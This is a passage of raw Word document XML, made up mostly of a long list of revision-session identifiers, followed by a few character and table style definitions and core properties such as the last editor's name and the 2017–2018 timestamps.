    <w:rsid w:val="00927B30"/>
    <w:rsid w:val="00932419"/>
    <w:rsid w:val="00933F2E"/>
    <w:rsid w:val="00941CC2"/>
    <w:rsid w:val="00947E72"/>
    <w:rsid w:val="009516A2"/>
    <w:rsid w:val="00953D6F"/>
    <w:rsid w:val="00954D54"/>
    <w:rsid w:val="009555C6"/>
    <w:rsid w:val="0096002C"/>
    <w:rsid w:val="00960568"/>
    <w:rsid w:val="009621F5"/>
    <w:rsid w:val="009640A4"/>
    <w:rsid w:val="00964433"/>
    <w:rsid w:val="009646A2"/>
    <w:rsid w:val="00965A7B"/>
    <w:rsid w:val="0096622D"/>
    <w:rsid w:val="00966C8E"/>
    <w:rsid w:val="0097076E"/>
    <w:rsid w:val="00971842"/>
    <w:rsid w:val="00971FBF"/>
    <w:rsid w:val="00971FD4"/>
    <w:rsid w:val="0097254F"/>
    <w:rsid w:val="00977004"/>
    <w:rsid w:val="00977B88"/>
    <w:rsid w:val="00980B9E"/>
    <w:rsid w:val="00981188"/>
    <w:rsid w:val="0098345C"/>
    <w:rsid w:val="00985234"/>
    <w:rsid w:val="0098562F"/>
    <w:rsid w:val="00986C9B"/>
    <w:rsid w:val="00987529"/>
    <w:rsid w:val="009900CE"/>
    <w:rsid w:val="009921F9"/>
    <w:rsid w:val="00993443"/>
    <w:rsid w:val="009A2515"/>
    <w:rsid w:val="009A3239"/>
    <w:rsid w:val="009A50E8"/>
    <w:rsid w:val="009B2FCD"/>
    <w:rsid w:val="009B7602"/>
    <w:rsid w:val="009B7A40"/>
    <w:rsid w:val="009C1045"/>
    <w:rsid w:val="009C1B8E"/>
    <w:rsid w:val="009C27E4"/>
    <w:rsid w:val="009C28CB"/>
    <w:rsid w:val="009C4457"/>
    <w:rsid w:val="009C511E"/>
    <w:rsid w:val="009D0935"/>
    <w:rsid w:val="009D2892"/>
    <w:rsid w:val="009D3FB5"/>
    <w:rsid w:val="009E10A8"/>
    <w:rsid w:val="009E378E"/>
    <w:rsid w:val="009E4FC4"/>
    <w:rsid w:val="009E5B76"/>
    <w:rsid w:val="009E63A5"/>
    <w:rsid w:val="009E644B"/>
    <w:rsid w:val="009E6909"/>
    <w:rsid w:val="009F0FA3"/>
    <w:rsid w:val="009F1B0E"/>
    <w:rsid w:val="009F1B5B"/>
    <w:rsid w:val="009F3472"/>
    <w:rsid w:val="009F3486"/>
    <w:rsid w:val="009F6571"/>
    <w:rsid w:val="00A028E1"/>
    <w:rsid w:val="00A02B38"/>
    <w:rsid w:val="00A06C51"/>
    <w:rsid w:val="00A06E20"/>
    <w:rsid w:val="00A07591"/>
    <w:rsid w:val="00A075C6"/>
    <w:rsid w:val="00A13F3D"/>
    <w:rsid w:val="00A14686"/>
    <w:rsid w:val="00A14875"/>
    <w:rsid w:val="00A22D63"/>
    <w:rsid w:val="00A22DDA"/>
    <w:rsid w:val="00A23ADC"/>
    <w:rsid w:val="00A23C45"/>
    <w:rsid w:val="00A27D98"/>
    <w:rsid w:val="00A324D6"/>
    <w:rsid w:val="00A32E80"/>
    <w:rsid w:val="00A335C5"/>
    <w:rsid w:val="00A33EF6"/>
    <w:rsid w:val="00A379CC"/>
    <w:rsid w:val="00A475A7"/>
    <w:rsid w:val="00A506F9"/>
    <w:rsid w:val="00A50BAE"/>
    <w:rsid w:val="00A51407"/>
    <w:rsid w:val="00A5331C"/>
    <w:rsid w:val="00A5499A"/>
    <w:rsid w:val="00A54C23"/>
    <w:rsid w:val="00A55EF1"/>
    <w:rsid w:val="00A60077"/>
    <w:rsid w:val="00A60666"/>
    <w:rsid w:val="00A66155"/>
    <w:rsid w:val="00A7026D"/>
    <w:rsid w:val="00A71201"/>
    <w:rsid w:val="00A72C31"/>
    <w:rsid w:val="00A72C33"/>
    <w:rsid w:val="00A730D4"/>
    <w:rsid w:val="00A73408"/>
    <w:rsid w:val="00A801EB"/>
    <w:rsid w:val="00A85851"/>
    <w:rsid w:val="00A90D04"/>
    <w:rsid w:val="00A9175D"/>
    <w:rsid w:val="00A93E3B"/>
    <w:rsid w:val="00A966A7"/>
    <w:rsid w:val="00AA3546"/>
    <w:rsid w:val="00AA4719"/>
    <w:rsid w:val="00AA5BFD"/>
    <w:rsid w:val="00AA60A4"/>
    <w:rsid w:val="00AA684F"/>
    <w:rsid w:val="00AA7243"/>
    <w:rsid w:val="00AB0B5B"/>
    <w:rsid w:val="00AB2097"/>
    <w:rsid w:val="00AB378D"/>
    <w:rsid w:val="00AB5358"/>
    <w:rsid w:val="00AB6DF1"/>
    <w:rsid w:val="00AB72AA"/>
    <w:rsid w:val="00AC2C78"/>
    <w:rsid w:val="00AD163A"/>
    <w:rsid w:val="00AD5ABA"/>
    <w:rsid w:val="00AD6F93"/>
    <w:rsid w:val="00AE25CC"/>
    <w:rsid w:val="00AE3F23"/>
    <w:rsid w:val="00AE4340"/>
    <w:rsid w:val="00AF0162"/>
    <w:rsid w:val="00AF07E1"/>
    <w:rsid w:val="00AF1300"/>
    <w:rsid w:val="00AF36D8"/>
    <w:rsid w:val="00AF53B9"/>
    <w:rsid w:val="00AF691F"/>
    <w:rsid w:val="00AF7DD5"/>
    <w:rsid w:val="00B04583"/>
    <w:rsid w:val="00B047AD"/>
    <w:rsid w:val="00B04DF3"/>
    <w:rsid w:val="00B05D8E"/>
    <w:rsid w:val="00B115E5"/>
    <w:rsid w:val="00B1216A"/>
    <w:rsid w:val="00B12228"/>
    <w:rsid w:val="00B12798"/>
    <w:rsid w:val="00B13272"/>
    <w:rsid w:val="00B154CE"/>
    <w:rsid w:val="00B15756"/>
    <w:rsid w:val="00B16990"/>
    <w:rsid w:val="00B205EB"/>
    <w:rsid w:val="00B21615"/>
    <w:rsid w:val="00B22187"/>
    <w:rsid w:val="00B266A2"/>
    <w:rsid w:val="00B3021C"/>
    <w:rsid w:val="00B32C77"/>
    <w:rsid w:val="00B3501E"/>
    <w:rsid w:val="00B43C8B"/>
    <w:rsid w:val="00B47370"/>
    <w:rsid w:val="00B474FA"/>
    <w:rsid w:val="00B47759"/>
    <w:rsid w:val="00B530B9"/>
    <w:rsid w:val="00B54159"/>
    <w:rsid w:val="00B600F5"/>
    <w:rsid w:val="00B611F9"/>
    <w:rsid w:val="00B652C8"/>
    <w:rsid w:val="00B65BCE"/>
    <w:rsid w:val="00B662D0"/>
    <w:rsid w:val="00B679A5"/>
    <w:rsid w:val="00B67D7D"/>
    <w:rsid w:val="00B7322E"/>
    <w:rsid w:val="00B7455F"/>
    <w:rsid w:val="00B81303"/>
    <w:rsid w:val="00B824C2"/>
    <w:rsid w:val="00B82F41"/>
    <w:rsid w:val="00B836FC"/>
    <w:rsid w:val="00B91DB0"/>
    <w:rsid w:val="00B95A6C"/>
    <w:rsid w:val="00B95FCC"/>
    <w:rsid w:val="00B97603"/>
    <w:rsid w:val="00BA4D85"/>
    <w:rsid w:val="00BB0C47"/>
    <w:rsid w:val="00BB19DF"/>
    <w:rsid w:val="00BB38AC"/>
    <w:rsid w:val="00BB5289"/>
    <w:rsid w:val="00BC32D5"/>
    <w:rsid w:val="00BC472F"/>
    <w:rsid w:val="00BD4AE6"/>
    <w:rsid w:val="00BD7566"/>
    <w:rsid w:val="00BD773B"/>
    <w:rsid w:val="00BE386F"/>
    <w:rsid w:val="00BE45C6"/>
    <w:rsid w:val="00BE5B1F"/>
    <w:rsid w:val="00BF0721"/>
    <w:rsid w:val="00BF1775"/>
    <w:rsid w:val="00BF1E8D"/>
    <w:rsid w:val="00BF2F22"/>
    <w:rsid w:val="00BF68B7"/>
    <w:rsid w:val="00C00501"/>
    <w:rsid w:val="00C02B69"/>
    <w:rsid w:val="00C03419"/>
    <w:rsid w:val="00C03659"/>
    <w:rsid w:val="00C041D6"/>
    <w:rsid w:val="00C07C23"/>
    <w:rsid w:val="00C109A2"/>
    <w:rsid w:val="00C12C84"/>
    <w:rsid w:val="00C20498"/>
    <w:rsid w:val="00C226C9"/>
    <w:rsid w:val="00C22F03"/>
    <w:rsid w:val="00C230BB"/>
    <w:rsid w:val="00C24FFB"/>
    <w:rsid w:val="00C343F7"/>
    <w:rsid w:val="00C42E7B"/>
    <w:rsid w:val="00C45090"/>
    <w:rsid w:val="00C468E8"/>
    <w:rsid w:val="00C46EF1"/>
    <w:rsid w:val="00C47CEA"/>
    <w:rsid w:val="00C52740"/>
    <w:rsid w:val="00C55792"/>
    <w:rsid w:val="00C56B46"/>
    <w:rsid w:val="00C60910"/>
    <w:rsid w:val="00C63266"/>
    <w:rsid w:val="00C66335"/>
    <w:rsid w:val="00C66842"/>
    <w:rsid w:val="00C71179"/>
    <w:rsid w:val="00C72DBA"/>
    <w:rsid w:val="00C7395D"/>
    <w:rsid w:val="00C746A6"/>
    <w:rsid w:val="00C7487C"/>
    <w:rsid w:val="00C823B1"/>
    <w:rsid w:val="00C829B4"/>
    <w:rsid w:val="00C838C4"/>
    <w:rsid w:val="00C838D0"/>
    <w:rsid w:val="00C85F99"/>
    <w:rsid w:val="00C86844"/>
    <w:rsid w:val="00C869E1"/>
    <w:rsid w:val="00C874B8"/>
    <w:rsid w:val="00C915D8"/>
    <w:rsid w:val="00C916C0"/>
    <w:rsid w:val="00C9607C"/>
    <w:rsid w:val="00C96615"/>
    <w:rsid w:val="00C972D7"/>
    <w:rsid w:val="00CA0B0B"/>
    <w:rsid w:val="00CA324C"/>
    <w:rsid w:val="00CA6138"/>
    <w:rsid w:val="00CA6F90"/>
    <w:rsid w:val="00CA7E75"/>
    <w:rsid w:val="00CC140F"/>
    <w:rsid w:val="00CC31E9"/>
    <w:rsid w:val="00CC4592"/>
    <w:rsid w:val="00CC4EA2"/>
    <w:rsid w:val="00CC6D98"/>
    <w:rsid w:val="00CD35AB"/>
    <w:rsid w:val="00CE0706"/>
    <w:rsid w:val="00CE14C5"/>
    <w:rsid w:val="00CE189E"/>
    <w:rsid w:val="00CE2419"/>
    <w:rsid w:val="00CE4BDA"/>
    <w:rsid w:val="00CE51B0"/>
    <w:rsid w:val="00CE7BD6"/>
    <w:rsid w:val="00CF336E"/>
    <w:rsid w:val="00CF3E48"/>
    <w:rsid w:val="00CF5EB7"/>
    <w:rsid w:val="00D01C30"/>
    <w:rsid w:val="00D05633"/>
    <w:rsid w:val="00D066C9"/>
    <w:rsid w:val="00D06777"/>
    <w:rsid w:val="00D071E6"/>
    <w:rsid w:val="00D07E31"/>
    <w:rsid w:val="00D12A5E"/>
    <w:rsid w:val="00D14CE3"/>
    <w:rsid w:val="00D2135D"/>
    <w:rsid w:val="00D2235D"/>
    <w:rsid w:val="00D249C2"/>
    <w:rsid w:val="00D314DF"/>
    <w:rsid w:val="00D3329A"/>
    <w:rsid w:val="00D342F7"/>
    <w:rsid w:val="00D36A43"/>
    <w:rsid w:val="00D4144F"/>
    <w:rsid w:val="00D4154E"/>
    <w:rsid w:val="00D41B86"/>
    <w:rsid w:val="00D4314B"/>
    <w:rsid w:val="00D44155"/>
    <w:rsid w:val="00D454AB"/>
    <w:rsid w:val="00D46775"/>
    <w:rsid w:val="00D4701E"/>
    <w:rsid w:val="00D51192"/>
    <w:rsid w:val="00D52D8D"/>
    <w:rsid w:val="00D54F38"/>
    <w:rsid w:val="00D56929"/>
    <w:rsid w:val="00D631E7"/>
    <w:rsid w:val="00D63EB9"/>
    <w:rsid w:val="00D65A24"/>
    <w:rsid w:val="00D715CB"/>
    <w:rsid w:val="00D71A28"/>
    <w:rsid w:val="00D71E20"/>
    <w:rsid w:val="00D73039"/>
    <w:rsid w:val="00D73077"/>
    <w:rsid w:val="00D731A4"/>
    <w:rsid w:val="00D751B0"/>
    <w:rsid w:val="00D803A8"/>
    <w:rsid w:val="00D820CE"/>
    <w:rsid w:val="00D90C3D"/>
    <w:rsid w:val="00D962D1"/>
    <w:rsid w:val="00D973FE"/>
    <w:rsid w:val="00DA4B04"/>
    <w:rsid w:val="00DA529A"/>
    <w:rsid w:val="00DA5F48"/>
    <w:rsid w:val="00DA6A91"/>
    <w:rsid w:val="00DB0863"/>
    <w:rsid w:val="00DB10ED"/>
    <w:rsid w:val="00DB3301"/>
    <w:rsid w:val="00DC1A98"/>
    <w:rsid w:val="00DC2676"/>
    <w:rsid w:val="00DC2C72"/>
    <w:rsid w:val="00DC501B"/>
    <w:rsid w:val="00DD10DE"/>
    <w:rsid w:val="00DD28D2"/>
    <w:rsid w:val="00DD4E15"/>
    <w:rsid w:val="00DD58E2"/>
    <w:rsid w:val="00DD66FE"/>
    <w:rsid w:val="00DE100E"/>
    <w:rsid w:val="00DE15D2"/>
    <w:rsid w:val="00DE26BA"/>
    <w:rsid w:val="00DE3675"/>
    <w:rsid w:val="00DE378B"/>
    <w:rsid w:val="00DE5FDD"/>
    <w:rsid w:val="00DE6DB0"/>
    <w:rsid w:val="00DF0AA6"/>
    <w:rsid w:val="00DF272A"/>
    <w:rsid w:val="00DF2E43"/>
    <w:rsid w:val="00DF577B"/>
    <w:rsid w:val="00DF5A89"/>
    <w:rsid w:val="00E03518"/>
    <w:rsid w:val="00E12BA6"/>
    <w:rsid w:val="00E15AC5"/>
    <w:rsid w:val="00E25A33"/>
    <w:rsid w:val="00E3051C"/>
    <w:rsid w:val="00E348A0"/>
    <w:rsid w:val="00E37322"/>
    <w:rsid w:val="00E41F17"/>
    <w:rsid w:val="00E43326"/>
    <w:rsid w:val="00E44619"/>
    <w:rsid w:val="00E45850"/>
    <w:rsid w:val="00E45A6B"/>
    <w:rsid w:val="00E47B70"/>
    <w:rsid w:val="00E50008"/>
    <w:rsid w:val="00E51D20"/>
    <w:rsid w:val="00E56623"/>
    <w:rsid w:val="00E56BE7"/>
    <w:rsid w:val="00E60379"/>
    <w:rsid w:val="00E62B5C"/>
    <w:rsid w:val="00E63F06"/>
    <w:rsid w:val="00E6457E"/>
    <w:rsid w:val="00E71225"/>
    <w:rsid w:val="00E71D6E"/>
    <w:rsid w:val="00E723B6"/>
    <w:rsid w:val="00E725E6"/>
    <w:rsid w:val="00E80FE2"/>
    <w:rsid w:val="00E81D13"/>
    <w:rsid w:val="00E83EE3"/>
    <w:rsid w:val="00E8684D"/>
    <w:rsid w:val="00E90C25"/>
    <w:rsid w:val="00E91500"/>
    <w:rsid w:val="00E93A49"/>
    <w:rsid w:val="00E95565"/>
    <w:rsid w:val="00EA0354"/>
    <w:rsid w:val="00EA4549"/>
    <w:rsid w:val="00EA7843"/>
    <w:rsid w:val="00EB2015"/>
    <w:rsid w:val="00EB4CB7"/>
    <w:rsid w:val="00EB4ECD"/>
    <w:rsid w:val="00EB4F53"/>
    <w:rsid w:val="00EB6432"/>
    <w:rsid w:val="00EB7F9B"/>
    <w:rsid w:val="00EC087A"/>
    <w:rsid w:val="00EC5C23"/>
    <w:rsid w:val="00EC5D14"/>
    <w:rsid w:val="00EC6360"/>
    <w:rsid w:val="00EC6A55"/>
    <w:rsid w:val="00ED1AA9"/>
    <w:rsid w:val="00ED2E5B"/>
    <w:rsid w:val="00ED3EC6"/>
    <w:rsid w:val="00ED6966"/>
    <w:rsid w:val="00ED6E9B"/>
    <w:rsid w:val="00EE1B2A"/>
    <w:rsid w:val="00EE2FA2"/>
    <w:rsid w:val="00EE3BE5"/>
    <w:rsid w:val="00EE4681"/>
    <w:rsid w:val="00EE5CEA"/>
    <w:rsid w:val="00EE7EFD"/>
    <w:rsid w:val="00EF08C0"/>
    <w:rsid w:val="00EF41CA"/>
    <w:rsid w:val="00EF47DF"/>
    <w:rsid w:val="00EF4AF3"/>
    <w:rsid w:val="00EF6D1C"/>
    <w:rsid w:val="00F032F3"/>
    <w:rsid w:val="00F05ABD"/>
    <w:rsid w:val="00F068E5"/>
    <w:rsid w:val="00F0748B"/>
    <w:rsid w:val="00F10687"/>
    <w:rsid w:val="00F134FD"/>
    <w:rsid w:val="00F17656"/>
    <w:rsid w:val="00F211B6"/>
    <w:rsid w:val="00F2130E"/>
    <w:rsid w:val="00F22604"/>
    <w:rsid w:val="00F25022"/>
    <w:rsid w:val="00F25D80"/>
    <w:rsid w:val="00F26A24"/>
    <w:rsid w:val="00F277D7"/>
    <w:rsid w:val="00F31709"/>
    <w:rsid w:val="00F329FF"/>
    <w:rsid w:val="00F35A28"/>
    <w:rsid w:val="00F364ED"/>
    <w:rsid w:val="00F378F0"/>
    <w:rsid w:val="00F466EB"/>
    <w:rsid w:val="00F5030A"/>
    <w:rsid w:val="00F5045D"/>
    <w:rsid w:val="00F5249E"/>
    <w:rsid w:val="00F53E0E"/>
    <w:rsid w:val="00F54B69"/>
    <w:rsid w:val="00F574C3"/>
    <w:rsid w:val="00F616ED"/>
    <w:rsid w:val="00F64B58"/>
    <w:rsid w:val="00F651D7"/>
    <w:rsid w:val="00F7046D"/>
    <w:rsid w:val="00F72365"/>
    <w:rsid w:val="00F72DB8"/>
    <w:rsid w:val="00F74E76"/>
    <w:rsid w:val="00F80CFA"/>
    <w:rsid w:val="00F81E5B"/>
    <w:rsid w:val="00F842C5"/>
    <w:rsid w:val="00F93781"/>
    <w:rsid w:val="00F939E4"/>
    <w:rsid w:val="00F9508E"/>
    <w:rsid w:val="00F96739"/>
    <w:rsid w:val="00F97020"/>
    <w:rsid w:val="00F978EF"/>
    <w:rsid w:val="00FA15CF"/>
    <w:rsid w:val="00FA2268"/>
    <w:rsid w:val="00FA258F"/>
    <w:rsid w:val="00FB0777"/>
    <w:rsid w:val="00FB2553"/>
    <w:rsid w:val="00FB461F"/>
    <w:rsid w:val="00FC2B81"/>
    <w:rsid w:val="00FC3345"/>
    <w:rsid w:val="00FC4AF7"/>
    <w:rsid w:val="00FC654D"/>
    <w:rsid w:val="00FD058C"/>
    <w:rsid w:val="00FD1642"/>
    <w:rsid w:val="00FD31CD"/>
    <w:rsid w:val="00FD379B"/>
    <w:rsid w:val="00FD39DE"/>
    <w:rsid w:val="00FD7459"/>
    <w:rsid w:val="00FE239C"/>
    <w:rsid w:val="00FE31D3"/>
    <w:rsid w:val="00FE6E35"/>
    <w:rsid w:val="00FE7959"/>
    <w:rsid w:val="00FF1DB4"/>
    <w:rsid w:val="00FF687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C885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87C"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="a4">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1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a0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Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00FC654D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00042560"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00042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DC34-9249-49D5-BB02-0123FBC4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12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cao lei</cp:lastModifiedBy>
  <cp:revision>1035</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-19T09:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-28T15:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>